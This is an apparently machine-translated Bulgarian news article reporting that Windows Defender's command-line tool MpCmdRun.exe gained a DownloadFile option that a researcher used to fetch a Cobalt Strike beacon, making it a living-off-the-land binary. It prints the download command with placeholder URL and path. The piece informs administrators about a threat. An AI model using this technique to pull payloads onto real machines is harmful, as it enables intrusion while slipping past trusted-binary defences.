Windows Defender се превръща в опасно приложение за администраторите

Windows Defender в Windows 10 е първата линия на защита в случай на злонамерени атаки и го прави доста добра работа също.

Въпреки това, в една от новите си актуализации, могъщият антивирус получи нова команда DownloadFile, която ще позволи на всеки да изтегли всеки файл от URL към определен път на вашия компютър.

Можем да наречем това експлойт, тъй като може да се използва дори за изтегляне на злонамерен софтуер, нещо, което беше открито от изследователя по сигурността Мохамад Аскар, който публикувано неговата находка в Twitter.

Как може да се използва Windows Defender за изтегляне на зловреден софтуер?

Наистина е лесно да използвате помощната програма за команден ред на Microsoft Antimalware Service (MpCmdRun.exe), за да изтеглите всеки файл от външен източник на вашия компютър.

MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]

В опита си, Аскар успя да изтегли маяк Cobalt Strike, добре познат инструмент за атакуващи, използвайки този команден ред.

Новата команда е включена във версията 4.18.2007.8-0 и нагоре, което дава доста добро начално време за нападателите.

По принцип тази функция се превръща Windows Defender в LOLBIN (живеещ извън двоичните файлове на реда), безвреден системен файл, който може да се използва за злонамерени цели.

За щастие, след като изтеглите вредния файл, той ще бъде открит от същия Windows Defender или от друг антивирусен софтуер ако присъства.

От надежден защитен софтуер Windows Defender се превърна в друга възможна заплаха, която ще трябва да бъде внимателно наблюдавана от администратори и експерти по сигурността.

Ако имате някакви предложения или коментари, моля, оставете ги по-долу в раздела за коментари.